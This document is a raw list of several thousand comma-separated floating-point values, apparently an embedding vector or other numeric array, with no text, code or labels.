-0.0026354484725743532, -0.008100154809653759, 0.019620053470134735, 0.01943167857825756, -0.048542968928813934, -0.030719729140400887, 0.003338234731927514, 0.003436045255511999, 0.039732784032821655, -0.021242983639240265, -0.02090970240533352, 0.008136381395161152, -0.017823239788413048, -0.0012217251351103187, 0.02656097337603569, -0.006774280220270157, -0.023706357926130295, -0.01728709414601326, 0.04752863943576813, 0.02682180143892765, -0.001049651182256639, 0.0013503277441486716, -0.028995368629693985, -0.006386660970747471, -0.0058468920178711414, -0.004789089784026146, -0.015794578939676285, -0.03399457037448883, -0.001278781215660274, 0.0028202016837894917, -0.0015794577775523067, 0.0022876779548823833, 0.030835652723908424, 0.005582441575825214, -0.0008123702136799693, 0.012729850597679615, -0.004318150691688061, 0.0182869341224432, -0.009940440766513348, 0.03961686044931412, 0.046862076967954636, -0.020663365721702576, -0.00662575289607048, -0.02561909519135952, -0.018214480951428413, -0.0017207396449521184, 0.006643866188824177, 0.019735977053642273, -0.029372118413448334, -0.020996645092964172, -0.015055566094815731, -0.024329446256160736, 0.015838049352169037, -0.001910926541313529, -0.010128816589713097, -0.004318150691688061, 0.011490917764604092, 0.013968782499432564, -0.007839327678084373, -0.023083269596099854, 0.003720420179888606, -0.0012362155830487609, 0.017982633784413338, -0.010751905851066113, 0.021866071969270706, -0.003388951299712062, 0.018098557367920876, -0.0033925739116966724, -0.004220340400934219, -0.04074711352586746, 0.0018747005378827453, 0.01312109176069498, -0.00093644461594522, -0.025111930444836617, 0.03529870882630348, 0.051470037549734116, 0.019735977053642273, -0.006321453955024481, -0.008418944664299488, 0.0059229666367173195, 0.002015982288867235, -0.020199671387672424, -0.020156200975179672, -0.012056045234203339, -0.004151510540395975, -0.03689265623688698, -0.014446967281401157, 0.001621117815375328, 0.015070056542754173, 0.0010478398762643337, -0.02001129649579525, 0.03831271827220917, 0.010541793890297413, -0.003829098306596279, -0.01875062845647335, -0.03002418950200081, 0.00976655539125204, 0.0067634121514856815, -0.024242503568530083, 0.00875222496688366, -0.009969421662390232, -0.0030266903340816498, 0.013229770585894585, -0.016519099473953247, 0.00927388109266758, -0.04477545619010925, -0.015258431434631348, 0.006238133646547794, -0.02201097644865513, -0.0027984660118818283, 0.001158329425379634, 0.010280965827405453, 0.005770817399024963, -0.010012893006205559, -0.034603167325258255, 0.001792286173440516, 0.007897289469838142, -0.028415750712156296, 0.01236758939921856, 0.00009198032057611272, -0.015794578939676285, 0.010672207921743393, -0.0029325024224817753, -0.0010034628212451935, 0.019257793202996254, -0.026126259937882423, -0.007375633344054222, 0.006412019021809101, -0.028010018169879913, -0.02363390475511551, 0.00025222418480552733, -0.023445529863238335, 0.00045984500320628285, -0.005499121267348528, 0.03048788197338581, 0.01638868637382984, -0.020677855238318443, -0.01792467199265957, 0.004002983681857586, 0.008795696310698986, -0.018214480951428413, 0.010701188817620277, 0.01393980160355568, 0.007643706165254116, 0.012316873297095299, -0.0072307288646698, 0.03521176427602768, 0.03074871003627777, -0.013780406676232815, 0.006930052302777767, -0.015301902778446674, 0.0034831392113119364, 0.015620692633092403, 0.004046455025672913, -0.03555953502655029, -0.025488682091236115, 0.00005119766137795523, 0.020967664197087288, -0.03216877207159996, -0.025894414633512497, 0.010143307037651539, 0.005959192756563425, 0.03399457037448883, -0.02253263257443905, 0.012447286397218704, 0.0027731077279895544, 0.014968623407185078, 0.018663685768842697, 0.011461936868727207, 0.009889724664390087, -0.015968462452292442, 0.013852858915925026, -0.00475286366418004, -0.02776367962360382, -0.03695061802864075, 0.018924511969089508, -0.0052781421691179276, -0.006853977683931589, -0.04648532718420029, -0.010505568236112595, 0.019301263615489006, -0.009049278683960438, -0.009534708224236965, 0.03442928194999695, 0.02141686901450157, -0.013577541336417198, -0.0005452027544379234, -0.0008925204747356474, -0.014997604303061962, -0.0003192424774169922, -0.010114326141774654, -0.04344233497977257, 0.01602642424404621, 0.004528262186795473, 0.005017314571887255, -0.001613872591406107, -0.014816473238170147, 0.00673080887645483, -0.015620692633092403, 0.017316075041890144, -0.0263581071048975, 0.0008051249897107482, 0.016794418916106224, -0.01110692135989666, 0.011179373599588871, 0.025372758507728577, -0.004886900540441275, -0.009259390644729137, 0.00716552184894681, 0.04039934277534485, -0.0014472325565293431, 0.010751905851066113, 0.004622450098395348, -0.031444251537323, 0.005093389190733433, -0.012722604908049107, -0.024662725627422333, -0.030140113085508347, 0.03269042819738388, -0.004810825455933809, 0.017518939450383186, -0.03002418950200081, 0.056077998131513596, -0.0021337170619517565, 0.013425391167402267, 0.012534229084849358, -0.006672847084701061, -0.04976016655564308, -0.017692824825644493, -0.01817101053893566, -0.0006529754027724266, -0.008375473320484161, -0.009896969422698021, 0.03776208311319351, 0.037211447954177856, 0.006024399772286415, 0.023648396134376526, -0.016881361603736877, 0.005875872913748026, 0.013302222825586796, 0.0012199138291180134, 0.0038653244264423847, 0.003959512338042259, 0.017359545454382896, 0.019040435552597046, 0.0014019499067217112, -0.03903724253177643, 0.015084546990692616, -0.007897289469838142, -0.006937297526746988, -0.041616540402173996, -0.012997923418879509, -0.009244900196790695, 0.0055353473871946335, -0.03364679962396622, 0.044195838272571564, 0.007853818126022816, 0.0035990627948194742, 0.018098557367920876, -0.0012244420358911157, -0.02556113339960575, 0.001999680418521166, 0.012461776845157146, 0.006412019021809101, 0.020576423034071922, -0.03631303831934929, -0.004202227108180523, 0.009657877497375011, -0.038428641855716705, 0.035501573234796524, -0.013352938927710056, 0.0015876087127253413, -0.020605403929948807, 0.009708593599498272, -0.0071401637978851795, -0.014149913564324379, -0.02932864800095558, 0.019620053470134735, 0.022025465965270996, 0.0021355284843593836, -0.0027205797377973795, 0.007006126921623945, -0.008498642593622208, -0.021300945430994034, -0.02393820509314537, 0.005680251866579056, -0.03938501328229904, 0.010223004035651684, 0.015316393226385117, 0.04648532718420029, 0.027285495772957802, -0.01864919438958168, 0.0348929762840271, 0.006948165129870176, 0.011744500137865543, -0.007154654245823622, -0.021445849910378456, 0.012338608503341675, 0.008737734518945217, -0.05033978447318077, -0.0008227851940318942, 0.01656257174909115, 0.055295512080192566, -0.006948165129870176, -0.0075929900631308556, -0.012671888805925846, -0.015417826361954212, 0.003713174955919385, -0.004108039196580648, -0.01097650732845068, -0.003403441747650504, 0.007176389917731285, 0.027676736935973167, -0.010280965827405453, 0.0011999894632026553, 0.0012280646478757262, -0.020547442138195038, -0.0030828407034277916, -0.008092910051345825, 0.007600235287100077, -0.0011927442392334342, -0.024126579985022545, -0.038486603647470474, -0.0024506954941898584, -0.0095854252576828, 0.030835652723908424, -0.0035211765207350254, -0.006734431255608797, 0.03184998407959938, 0.026372598484158516, -0.010092590935528278, -0.005020936951041222, -0.0067525445483624935, -0.008332001976668835, -0.012874755077064037, 0.012374834157526493, -0.02566256746649742, -0.02938660979270935, 0.018953492864966393, -0.01944616809487343, -0.0007883704383857548, -0.021185021847486496, 0.026184221729636192, 0.008462416008114815, 0.020446008071303368, 0.013794897124171257, -0.014316553249955177, 0.005064408294856548, 0.008542113937437534, -0.05474487692117691, 0.006716318428516388, -0.004477545619010925, -0.022865911945700645, -0.008962335996329784, 0.010578020475804806, 0.017881201580166817, 0.01307037565857172, -0.038631509989500046, 0.011556125245988369, 0.02750285342335701, -0.0365738682448864, -0.02132992632687092, -0.015243940986692905, -0.016171328723430634, -0.027010178193449974, 0.0138093875721097, -0.015099037438631058, 0.014562890864908695, -0.019793938845396042, -0.007810346316546202, 0.020083747804164886, 0.009853498078882694, -0.008020457811653614, -0.006335944402962923, 0.00010618774831527844, 0.015432316809892654, -0.04074711352586746, -0.00126338517293334, 0.010773641057312489, 0.006089606788009405, 0.012034309096634388, -0.026445049792528152, 0.0001914322783704847, -0.02515540085732937, -0.009911459870636463, 0.012563209980726242, 0.012200949713587761, -0.01822897233068943, 0.0007544084801338613, 0.008230568841099739, 0.01459187176078558, -0.012867509387433529, 0.0023601301945745945, -0.015794578939676285, -0.03054584376513958, 0.03709552437067032, -0.010302701964974403, 0.031038518995046616, -0.002104736166074872, -0.0016165896086022258, 0.03060380555689335, 0.03776208311319351, 0.02745938114821911, -0.041935328394174576, -0.006806883495301008, -0.019895372912287712, -0.008114645257592201, 0.0023076024372130632, 0.023126740008592606, -0.01325150579214096, -0.003479516599327326, 0.013396410271525383, 0.011831442825496197, -0.002436205046251416, -0.0028292580973356962, 0.008991316892206669, 0.008926110342144966, 0.0015070056542754173, -0.02567705698311329, 0.028256354853510857, -0.00418049143627286, -0.015461297705769539, 0.04341335594654083, 0.057440098375082016, 0.001568589941598475, -0.0012996111763641238, 0.019402697682380676, 0.00034912899718619883, 0.014729530550539494, -0.006531564984470606, 0.02147483080625534, 0.013584786094725132, -0.015128018334507942, 0.009252144955098629, -0.01780874840915203, 0.03932705149054527, -0.017881201580166817, 0.02445986121892929, -0.014389005489647388, 0.0002762239892035723, -0.02676383964717388, 0.004770976956933737, 0.011708274483680725, -0.0007666347664780915, -0.02403963729739189, 0.01672196574509144, 0.0017868522554636002, -0.0009169730474241078, -0.009607160463929176, -0.006517075002193451, 0.01312109176069498, -0.0008223323966376483, 0.012780566699802876, -0.003713174955919385, 0.019721487537026405, -0.008049438707530499, -0.022025465965270996, 0.02938660979270935, -0.017055246978998184, -0.013229770585894585, -0.000589126895647496, 0.014700549654662609, -0.008889883756637573, 0.005412179045379162, -0.00982451718300581, -0.008179852738976479, 0.016316233202815056, -0.029850304126739502, -0.01592499203979969, -0.02269202657043934, -0.04068915173411369, 0.007643706165254116, -0.004912258591502905, -0.013208034448325634, -0.015026585198938847, -0.017330564558506012, 0.017069736495614052, 0.007839327678084373, -0.00013731954095419496, 0.004271056968718767, 0.07992926239967346, -0.00032965748687274754, -0.008462416008114815, -0.005890363361686468, -0.022749988362193108, 0.0011374994646757841, 0.014881680719554424, 0.009802781976759434, 0.01722913235425949, -0.023489000275731087, 0.015794578939676285, 0.014251346699893475, -0.013208034448325634, 0.0073502748273313046, 0.015229450538754463, 0.018373876810073853, -0.01880859024822712, -0.020808270201086998, 0.022329766303300858, -0.012085026130080223, 0.011896650306880474, 0.018605723977088928, -0.005183954257518053, 0.006998881697654724, 0.02744489163160324, 0.009933196008205414, -0.0026100901886820793, -0.021822599694132805, -0.025894414633512497, 0.006933674681931734, 0.021924033761024475, 0.017634863033890724, -0.004274679347872734, -0.013613766990602016, 0.00237643183209002, 0.01433104369789362, 0.013606522232294083, 0.04547099769115448, -0.018504289910197258, -0.029792342334985733, -0.010875074192881584, -0.028415750712156296, -0.0169827938079834, 0.003803740255534649, 0.0024325824342668056, -0.008165362291038036, 0.02085174061357975, -0.00919418316334486, -0.010599755682051182, 0.007955251261591911, 0.006031644996255636, -0.009896969422698021, 0.015649674460291862, 0.006143946200609207, 0.014562890864908695, -0.0036371001042425632, -0.015287412330508232, -0.002300357213243842, -0.005180331878364086, -0.003066539065912366, 0.011309787631034851, 0.02840125933289528, -0.013751426711678505, -0.015794578939676285, 0.005194822326302528, -0.00825230497866869, -0.03164711967110634, -0.025952376425266266, -0.015156999230384827, 0.010063610039651394, 0.020880721509456635, 0.007455330807715654, 0.0010007459204643965, -0.00026014866307377815, -0.009230409748852253, -0.03399457037448883, -0.011411220766603947, 0.021880561485886574, -0.03567545861005783, -0.010983752086758614, 0.006506206933408976, 0.009375314228236675, -0.0018384744180366397, 0.03332800790667534, -0.00851313304156065, 0.029850304126739502, -0.010556284338235855, -0.02525683492422104, 0.00470214756205678, -0.004231208004057407, -0.012845774181187153, 0.002403601538389921, 0.012295137159526348, 0.007701667957007885, 0.005238293670117855, 0.03315412253141403, 0.011469182558357716, -0.024184541776776314, -0.025213362649083138, -0.017881201580166817, 0.01582355983555317, 0.0028129564598202705, -0.009781045839190483, -0.004140642937272787, -0.0014091951306909323, 0.017055246978998184, 0.00875222496688366, 0.0031552929431200027, -0.004687657114118338, -0.015780087560415268, -0.0057889302261173725, -0.006661979015916586, -0.003984870854765177, -0.023909224197268486, 0.005520856939256191, -0.0013186299474909902, 0.005354217253625393, 0.0023528849706053734, -0.009672367945313454, -0.025633586570620537, -0.015736617147922516, 0.010860583744943142, 0.008759469725191593, -0.017200151458382607, 0.0026952216867357492, -0.0046912794932723045, 0.02409759908914566, -0.01435277983546257, 0.02089521288871765, 0.025503171607851982, 0.02143135853111744, -0.0026970328763127327, 0.019938843324780464, -0.017417507246136665, -0.006988014094531536, -0.017721805721521378, 0.02838676981627941, 0.01602642424404621, 0.002021416090428829, 0.009201428852975368, -0.002887219889089465, 0.01427308190613985, -0.02159075438976288, 0.02503947727382183, 0.015388845466077328, -0.00037018541479483247, 0.005883118137717247, -0.007650951389223337, 0.006734431255608797, 0.01906941644847393, 0.031212404370307922, -0.02906781993806362, 0.02079377882182598, -0.003099142573773861, 0.007390123791992664, -0.039269089698791504, 0.016229290515184402, -0.007766874972730875, -0.0070206173695623875, 0.013302222825586796, -0.004122529644519091, 0.010382398962974548, 0.0119401216506958, -0.006093229632824659, -0.012744341045618057, 0.019663525745272636, -0.006169304251670837, -0.003995738457888365, -0.02089521288871765, 0.021185021847486496, 0.011585106141865253, -0.004785467404872179, -0.01944616809487343, 0.007158276624977589, 0.009925950318574905, 0.024184541776776314, -0.001903681317344308, -0.002608278999105096, 0.03961686044931412, -0.02335858717560768, 0.016881361603736877, 0.004274679347872734, 0.02037355676293373, 0.010693944059312344, -0.020677855238318443, 0.00882467720657587, -0.0033219330944120884, 0.00015543260087724775, -0.03961686044931412, 0.018475309014320374, 0.021358907222747803, 0.037849023938179016, -0.0216921865940094, -0.01724362187087536, 0.010389644652605057, -0.0144614577293396, -0.016374194994568825, -0.034545205533504486, 0.007477066479623318, -0.008976826444268227, -0.014389005489647388, -0.035501573234796524, 0.0062345112673938274, -0.001977944979444146, 0.003053860040381551, -0.044717494398355484, -0.011577860452234745, -0.011222844943404198, -0.007629215717315674, 0.00836098287254572, -0.008165362291038036, 0.012903735972940922, -0.0005827873246744275, 0.007969741709530354, 0.02445986121892929, -0.006596772000193596, -0.01498311385512352, -0.02351798117160797, -0.012447286397218704, 0.006738054100424051, -0.0034251774195581675, -0.01911288872361183, 0.010440360754728317, -0.016852380707859993, -0.024764159694314003, -0.00943327508866787, 0.018562251701951027, -0.022822441533207893, 0.008904374204576015, 0.001017047674395144, -0.02488008327782154, -0.01472228579223156, -0.011048959568142891, 0.013642747886478901, -0.011411220766603947, -0.00045531673822551966, -0.0016980982618406415, 0.008658037520945072, 0.0003509403031785041, 0.003872569650411606, 0.017750786617398262, -0.013258751481771469, -0.017359545454382896, -0.015446807257831097, -0.012657398357987404, -0.00029320496832951903, 0.014135423116385937, 0.017417507246136665, -0.0049484847113490105, -0.0030900859273970127, 0.0022043578792363405, 0.000263092020759359, 0.007962496019899845, -0.009534708224236965, -0.006386660970747471, -0.006542433053255081, -0.0008341058855876327, -0.03173406049609184, -0.04092099890112877, -0.008592830039560795, 0.05668659508228302, -0.019938843324780464, -0.010672207921743393, 0.03799393028020859, -0.03851558640599251, 0.007353897672146559, -0.012744341045618057, -0.0015214961022138596, -0.003466837340965867, 0.01666400395333767, 0.0017189283389598131, 0.005763572175055742, -0.002537637948989868, -0.0035048748832195997, -0.01911288872361183, 0.002557562431320548, 0.0052708969451487064, -0.0035755157005041838, 0.0007933515007607639, 0.014439722523093224, 0.0029795963782817125, 0.039587877690792084, 0.02477864921092987, -0.01598295383155346, -0.0028962765354663134, -0.013780406676232815, -0.04903564602136612, 0.020025786012411118, 0.014577381312847137, -0.005868627689778805, 0.01409195177257061, 0.001178253791294992, 0.0151135278865695, -0.010969261638820171, 0.009375314228236675, -0.005473763216286898, -0.018620213493704796, 0.03802290931344032, 0.024010656401515007, -0.007234351709485054, -0.000033056312531698495, 0.02132992632687092, -0.004122529644519091, 0.0028835972771048546, -0.010954771190881729, -0.002195301465690136, -0.020967664197087288, -0.003015822498127818, -0.0017388525884598494, 0.0023583187721669674, -0.005209312774240971, 0.0011701029725372791, -0.017620373517274857, 0.014099196530878544, -0.007520537823438644, -0.013867349363863468, -0.014801982790231705, 0.015287412330508232, -0.040515266358852386, 0.005817911121994257, -0.0044376966543495655, -0.003995738457888365, -0.016649514436721802, -0.009005807340145111, -0.006734431255608797, 0.003242235630750656, -0.018402857705950737, 0.004137020092457533, -0.012903735972940922, -0.001977944979444146, 0.005843269173055887, 0.0039160409942269325, 0.026024827733635902, -0.004452187102288008, -0.0031154442112892866, 0.004021096508949995, 0.017272602766752243, -0.006589526776224375, -0.016258271411061287, 0.007299558259546757, -0.01638868637382984, 0.03141527250409126, -0.0015414203517138958, 0.00742634991183877, 0.014417986385524273, 0.009165202267467976, 0.011490917764604092, 0.00650982977822423, 0.007897289469838142, -0.012041554786264896, -0.03158915787935257, 0.005843269173055887, 0.019301263615489006, -0.009650631807744503, 0.0007621065014973283, 0.014997604303061962, -0.006513452157378197, 0.0038580792024731636, 0.01995333470404148, -0.022764479741454124, -0.00272420234978199, -0.00640477379783988, -0.0033020086120814085, 0.015345374122262001, 0.011635822243988514, -0.021967504173517227, -0.00825230497866869, 0.012642907910048962, 0.00864354707300663, 0.013983272947371006, 0.016736457124352455, -0.004365244414657354, 0.03558851778507233, -0.01343988161534071, 0.01922881230711937, -0.011353258974850178, 0.031936924904584885, -0.02079377882182598, -0.013693464919924736, 0.026546483859419823, -0.0071981255896389484, 0.0006914656260050833, -0.009650631807744503, -0.012331362813711166, -0.0009328220039606094, -0.008534868247807026, -0.019344735890626907, -0.023662885650992393, -0.011932875961065292, -0.01154887955635786, 0.026546483859419823, 0.006542433053255081, 0.022025465965270996, 0.0374143123626709, 0.004318150691688061, -0.006792393047362566, -0.028850464150309563, 0.02467721700668335, -0.016997285187244415, -0.006701827980577946, -0.003624421078711748, -0.025792980566620827, -0.022083427757024765, 0.018794098868966103, 0.02095317468047142, 0.006828619167208672, -0.021402377635240555, -0.03416845574975014, 0.008027702569961548, -0.014229610562324524, 0.0008268606616184115, 0.004053700249642134, -0.010925790295004845, -0.004578978754580021, -0.012534229084849358, -0.012229930609464645, -0.01880859024822712, 0.032719410955905914, 0.011317032389342785, -0.022387728095054626, 0.019938843324780464, -0.007328539155423641, -0.027430400252342224, -0.036689791828393936, -0.023329606279730797, -0.0035881949588656425, -0.00463694054633379, 0.0051368605345487595, -0.004912258591502905, 0.0017479091184213758, -0.0023293381091207266, 0.013106601312756538, 0.010643227025866508, -0.025430720299482346, 0.020924193784594536, 0.0060461354441940784, -0.009520217776298523, 0.004191359505057335, -0.011317032389342785, 0.02347451075911522, 0.004593469202518463, -0.004281924571841955, 0.020924193784594536, -0.00919418316334486, -0.008281285874545574, 0.00008943317516241223, -0.0011963668512180448, -0.0009187843534164131, -0.018199991434812546, -0.006267114542424679, 0.02159075438976288, -0.008940600790083408, 0.027749190106987953, 0.007455330807715654, 0.006285227835178375, -0.008600075729191303, 0.004658676218241453, 0.005173086654394865, 0.005386820528656244, 0.0027477494440972805, 0.005966437980532646, -0.010722924955189228, 0.01812753826379776, -0.010360663756728172, 0.0195476021617651, 0.0013195355422794819, 0.01280954759567976, -0.00003631100116763264, -0.02630014531314373, -0.006959033198654652, 0.00042203403427265584, -0.0068213739432394505, 0.027792660519480705, 0.013729690574109554, 0.001427308190613985, -0.0034758939873427153, -0.012432795949280262, -0.016910342499613762, 0.016214800998568535, 0.0031353686936199665, 0.019779449328780174, 0.03216877207159996, 0.004325395915657282, -0.002628203248605132, -0.00043516597361303866, -0.000045084510929882526, -0.0006076927529647946, -0.014287572354078293, 0.009795536287128925, -0.009252144955098629, -0.0138093875721097, -0.026256674900650978, 0.001427308190613985, 0.0062345112673938274, 0.014896171167492867, 0.013787652365863323, 0.011230089701712132, 0.02593788504600525, 0.010708434507250786, -0.005111502017825842, -0.006593149621039629, -0.008462416008114815, -0.0009799159597605467, 0.00048678816528990865, 0.009795536287128925, 0.006647488567978144, -0.009179692715406418, 0.011650312691926956, 0.015229450538754463, -0.021445849910378456, -0.00516221858561039, -0.0024760537780821323, -0.010302701964974403, 0.00025743170408532023, -0.01317905355244875, 0.01244004163891077, 0.007759629748761654, -0.01618582010269165, -0.01672196574509144, 0.004296415019780397, -0.007708913180977106, -0.01225891150534153, 0.013548560440540314, -0.006991636473685503, -0.02419903315603733, 0.006372170522809029, 0.02283693104982376, -0.012824038043618202, -0.00696990080177784, -0.026894254609942436, 0.0005189388175494969, 0.01414266787469387, -0.002608278999105096, -0.00003659401772893034, 0.009201428852975368, 0.005281765013933182, 0.02247467078268528, -0.014005009084939957, 0.0030882747378200293, 0.003984870854765177, -0.006107720080763102, -0.006332321558147669, -0.0004994673072360456, 0.00631420873105526, 0.0008114645606838167, -0.005252784118056297, 0.008991316892206669, -0.014765757136046886, -0.02399616688489914, 0.01656257174909115, -0.0012316872598603368, -0.0044268290512263775, -0.004231208004057407, -0.009520217776298523, -0.01079537719488144, -0.003441479289904237, -0.006788770668208599, -0.003113633021712303, -0.007103937678039074, 0.0023528849706053734, -0.005122370086610317, 0.016736457124352455, 0.018562251701951027, 0.03257450461387634, 0.007176389917731285, 0.011360503733158112, 0.000923765473999083, -0.0015550052048638463, -0.0027875981759279966, -0.011860423721373081, 0.013265996240079403, 0.0004580336972139776, -0.008708753623068333, 0.002332960721105337, 0.0023130362387746572, 0.0003801475977525115, 0.01760588213801384, -0.006814128719270229, 0.006390283349901438, -0.005321613512933254, 0.013222524896264076, 0.011483673006296158, -0.011795217171311378, -0.023662885650992393, -0.005752704106271267, -0.0101940231397748, -0.010382398962974548, -0.010244740173220634, -0.009918705560266972, -0.013273241929709911, 0.0132007896900177, 0.0035048748832195997, -0.030690748244524002, 0.018055086955428123, 0.004318150691688061, 0.00819434318691492, -0.030951576307415962, -0.010259230621159077, 0.0026571841444820166, 0.005194822326302528, 0.004147888161242008, 0.01115763746201992, 0.001424591289833188, -0.0067525445483624935, -0.0034197436179965734, -0.005883118137717247, -0.01010708138346672, -0.02075030840933323, 0.005274519789963961, -0.004231208004057407, 0.007904534228146076, 0.0007666347664780915, 0.00220073526725173, -0.00032060095691122115, -0.01886655017733574, -0.014135423116385937, -0.028299827128648758, 0.010780886746942997, -0.010389644652605057, -0.04138469323515892, 0.010128816589713097, -0.011193864047527313, 0.008868148550391197, 0.005151350982487202, 0.01199808344244957, 0.007314048707485199, -0.01338916551321745, -0.019895372912287712, 0.00481807067990303, 0.012657398357987404, 0.019098397344350815, -0.004847051575779915, -0.004213095176964998, -0.008549358695745468, -0.01776527799665928, 0.013816633261740208, -0.014780247583985329, 0.005249161273241043, -0.007600235287100077, -0.009969421662390232, 0.004100793972611427, -0.010063610039651394, -0.01802610605955124, -0.013983272947371006, -0.02179361879825592, 0.0043616220355033875, 0.000997123308479786, -0.009925950318574905, 0.008810186758637428, 0.05045570805668831, -0.0014336478197947145, 0.0012199138291180134, -0.014997604303061962, 0.0027459380216896534, -0.008831921964883804, -0.010404135100543499, -0.013222524896264076, 0.01718566007912159, -0.0028455599676817656, -0.0018656440079212189, 0.009672367945313454, 0.0267783310264349, -0.016881361603736877, 0.004213095176964998, -0.011280806735157967, 0.003416121006011963, -0.016678495332598686, 0.012968942523002625, 0.009983912110328674, 0.011773481033742428, 0.009534708224236965, -0.015316393226385117, -0.015809068456292152, -0.010534549131989479, -0.012505248188972473, -0.011208354495465755, 0.007846572436392307, 0.006926429457962513, -0.01666400395333767, 0.005354217253625393, -0.0138093875721097, 0.00880294106900692, 0.0013829312520101666, 0.005042672622948885, -0.006506206933408976, -0.020924193784594536, -0.012425551190972328, 0.0073502748273313046, -0.002253263257443905, -0.0033817060757428408, 0.0007630121544934809, 0.011135902255773544, 0.02870555967092514, -0.011990837752819061, -0.005129615310579538, -0.038631509989500046, -0.009020297788083553, 0.02033008448779583, -0.009368068538606167, 0.012664643116295338, 0.0021264718379825354, -0.0005166747141629457, -0.00013448938261717558, 0.003017633920535445, -0.008129135705530643, 0.004868787247687578, 0.010759150609374046, 0.014439722523093224, 0.02127196453511715, 0.0022297161631286144, 0.020721327513456345, -0.0017859465442597866, 0.01680890843272209, 0.000647088629193604, -0.011512653902173042, 0.010570774786174297, -0.007875553332269192, 0.01927228271961212, 0.020286614075303078, -0.0063649252988398075, -0.022329766303300858, -0.01388183981180191, 0.013396410271525383, -0.005180331878364086, 0.011889404617249966, 0.005763572175055742, 0.034342341125011444, -0.007687177509069443, -0.01770731620490551, -0.011983592994511127, 0.011461936868727207, 0.01079537719488144, 0.042138196527957916, -0.006325076334178448, -0.000022287540559773333, -0.0007204465218819678, 0.008542113937437534, -0.03016909398138523, 0.0004612034827005118, -0.00023128098109737039, 0.009114486165344715, -0.009317352436482906, -0.008034948259592056, 0.0050970115698874, 0.008201587945222855, -0.0022822441533207893, 0.010672207921743393, 0.016794418916106224, -0.015562730841338634, 0.006028022617101669, -0.01806957647204399, 0.010208513587713242, 0.002459751907736063, -0.006799638271331787, 0.025590114295482635, -0.009592670015990734, -0.020808270201086998, 0.007353897672146559, 0.007643706165254116, -0.015504769049584866, 0.017852220684289932, 0.008984072133898735, 0.008339247666299343, 0.02645954117178917, 0.02283693104982376, 0.023546962067484856, -0.0025014120619744062, -0.004926749039441347, -0.012331362813711166, -0.01586703024804592, -0.0031860852614045143, 0.03269042819738388, 0.02650301158428192, -0.002505034673959017, 0.011092430911958218, 0.0016573439352214336, 0.008737734518945217, -0.009889724664390087, 0.01325150579214096, -0.024213522672653198, -0.010223004035651684, -0.011541634798049927, -0.02115604095160961, 0.016098877415060997, 0.041413672268390656, -0.00274412683211267, -0.0006058814469724894, 0.0037167975679039955, 0.010534549131989479, -0.016910342499613762, -0.006712695583701134, -0.024807630106806755, 0.021909542381763458, -0.005549837835133076, -0.01891002245247364, -0.02279346063733101, 0.006553300656378269, 0.008592830039560795, 0.006151191424578428, -0.007107560057193041, -0.0036135532427579165, -0.04657226800918579, -0.026517502963542938, 0.008781205862760544, 0.024242503568530083, 0.01891002245247364, 0.0009862554725259542, -0.0012344042770564556, 0.0002879974781535566, 0.0008956902311183512, -0.01792467199265957, -0.0018140217289328575, -0.017156679183244705, 0.004028341732919216, -0.012990678660571575, 0.01293996162712574, -0.0030121998861432076, -0.007976986467838287, 0.03996463119983673, 0.004684034269303083, 0.008730488829314709, -0.026908744126558304, 0.026184221729636192, -0.0040500774048268795, 0.013432636857032776, -0.022257313132286072, -0.007803101092576981, -0.02483661100268364, 0.005875872913748026, -0.028299827128648758, -0.011338768526911736, 0.00036520432331599295, 0.016577061265707016, -0.00005807496199849993, -0.016837889328598976, -0.004198604729026556, -0.0016084386734291911, -0.00843343511223793, -0.007621970493346453, -0.0006941825849935412, -0.013215280137956142, -0.0046804118901491165, 0.009599915705621243, 0.01154887955635786, -0.025590114295482635, -0.0204315185546875, -0.00368057144805789, -0.000002341960453122738, 0.0026173354126513004, -0.010817112401127815, -0.00793351512402296, -0.006024399772286415, -0.009527463465929031, -0.0041152844205498695, -0.003814607858657837, 0.004499281290918589, -0.015316393226385117, -0.027575304731726646, -0.030632786452770233, -0.001779607031494379, 0.0005352405714802444, 0.009172447957098484, 0.007578499615192413, -0.011143147014081478, -0.0021463963203132153, -0.013997763395309448, 0.006908316630870104, -0.017823239788413048, -0.025691548362374306, -0.01108518522232771, 0.03211081027984619, 0.010360663756728172, 0.006484471261501312, 0.01933024451136589, 0.0021011135540902615, -0.015475788153707981, -0.003713174955919385, -0.01654808036983013, -0.031560175120830536, 0.007455330807715654, 0.002015982288867235, -0.011019978672266006, -0.030980557203292847, 0.011179373599588871, 0.014751266688108444, 0.012592190876603127, 0.016359705477952957, -0.0051368605345487595, -0.030140113085508347, -0.015635183081030846, -0.02351798117160797, -0.0006018060375936329, -0.026155240833759308, 0.012773321941494942, 0.019344735890626907, 0.006672847084701061, 0.011925631202757359, -0.004785467404872179, 0.003785627195611596, 0.010251984931528568, -0.027430400252342224, 0.021547282114624977, 0.0017678334843367338, 0.018895531073212624, 0.003995738457888365, 0.009578179568052292, 0.007129295729100704, -0.012577700428664684, 0.0005936551606282592, 0.008266795426607132, 0.01722913235425949, 0.01359203178435564, -0.0021735657937824726, 0.014635343104600906, 0.004452187102288008, -0.01134601328521967, -0.011353258974850178, -0.01718566007912159, -0.0018439083360135555, 0.012867509387433529, 0.024083109572529793, 0.009027543477714062, -0.007353897672146559, -0.0030937085393816233, 0.007998721674084663, 0.004137020092457533, 0.030458901077508926, -0.020460499450564384, -0.02435842715203762, -0.004242076072841883, 0.016692984849214554, -0.002834692131727934, 0.007042353041470051, -0.0035356669686734676, -0.030140113085508347, 0.02085174061357975, 0.015287412330508232, -0.022503651678562164, -0.010114326141774654, -0.008665282279253006, 0.00729593588039279, -0.008976826444268227, -0.0006584093207493424, -0.01073741540312767, -0.009599915705621243, -0.03132832795381546, -0.006774280220270157, -0.0077958558686077595, 0.022402217611670494, 0.006060625892132521, -0.009679612703621387, -0.012476267293095589, -0.010425870306789875, -0.015417826361954212, -0.03521176427602768, 0.004908636212348938, -0.02201097644865513, 0.01770731620490551, 0.011824198067188263, -0.026184221729636192, -0.019040435552597046, 0.02608278952538967, 0.007752384524792433, 0.013765917159616947, 0.0022858667653054, 0.0016437590820714831, -0.035182785242795944, -0.0037349106278270483, -0.003720420179888606, -0.0002671674592420459, -0.003280272940173745, -0.015809068456292152, 0.008158116601407528, -0.02185158059000969, 0.02127196453511715, 0.018678175285458565, 0.007082202006131411, -0.005314368288964033, -0.011070694774389267, 0.006361302454024553, -0.03309616073966026, 0.0006298812804743648, -0.0006434660172089934, -0.012541474774479866, -0.017736297100782394, -0.009360823780298233, -0.0009156145970337093, 0.008281285874545574, 0.008911619894206524, -0.011932875961065292, -0.024126579985022545, -0.005506366491317749, 0.011795217171311378, -0.011099675670266151, 0.013642747886478901, -0.03138628974556923, 0.025430720299482346, 